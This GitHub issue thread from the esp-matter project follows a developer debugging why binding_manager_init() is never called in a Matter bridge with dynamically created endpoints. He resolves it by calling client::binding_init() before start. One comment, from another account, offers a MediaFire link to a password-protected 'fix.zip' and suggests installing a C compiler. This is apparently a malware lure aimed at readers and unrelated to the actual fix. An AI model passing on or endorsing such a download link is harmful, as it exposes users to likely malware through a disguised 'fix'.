espressif/esp-matter #1098: binding_manager_init()

jonsmirl, 2024-09-29:
In a bridge where all of the endpoints are dynamically created binding_manager_init() is never getting called.  I think this is because  initialize_binding_manager = true; is expected to be set before matter start is called. But in the case of the bridge with dynamic endpoints it only gets set after matter start.  This manifests as attribute 0 from the binding cluster not getting reported to a subscription if  the binding manager is not started.  

I'm going to try calling binding_init(), binding_manager_init() manually before matter start and see if I can get attrib 0 on my binding clusters to appear.

jonsmirl, 2024-09-29:
Calling binding_init() before matter start gets the binding manager started.
~~~
    client::binding_init();
    err = esp_matter::start(app_event_cb);
~~~
But.... attrib 0 on my bindings clusters is still not getting reported.
~~~
I (11778) esp_matter_attribute: ********** R : Endpoint 0x0002's Cluster 0x00000062's Attribute 0x00000001 is 16 **********
I (11782) esp_matter_attribute: ********** R : Endpoint 0x0002's Cluster 0x0000001E's Attribute 0x0000FFFC is 0 **********
I (11783) esp_matter_attribute: ********** R : Endpoint 0x0002's Cluster 0x0000001E's Attribute 0x0000FFFD is 1 **********
I (11785) esp_matter_attribute: ********** R : Endpoint 0x0002's Cluster 0x00000006's Attribute 0x0000FFFC is 1 **********
~~~

SagarChandra07, 2024-09-29:
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

jonsmirl, 2024-09-29:
So it is calling Read in AttributeAccessInterface, but it is not reporting...
~~~
I (7863) esp_matter_attribute: ********** R : Endpoint 0x0003's Cluster 0x00000062's Attribute 0x00000001 is 16 **********
BindingTableAccess::Read 65532
I (7866) esp_matter_attribute: ********** R : Endpoint 0x0003's Cluster 0x0000001E's Attribute 0x0000FFFC is 0 **********
BindingTableAccess::Read 
BindingTableAccess::Read 65533
I (7868) esp_matter_attribute: ********** R : Endpoint 0x0003's Cluster 0x0000001E's Attribute 0x0000FFFD is 1 **********
~~~
so keep debugging

jonsmirl, 2024-09-29:
This message is log is probably bad:
~~~
I (2061) chip[SVR]: Cannot load binding table: a0
~~~

jonsmirl, 2024-10-16:
The problem is this:
~~~
    client::binding_init();
    err = esp_matter::start(app_event_cb);
~~~
Because my endpoints are dynamically created through the bridge code binding_init() never gets called. When I manually start binding_init everything works right.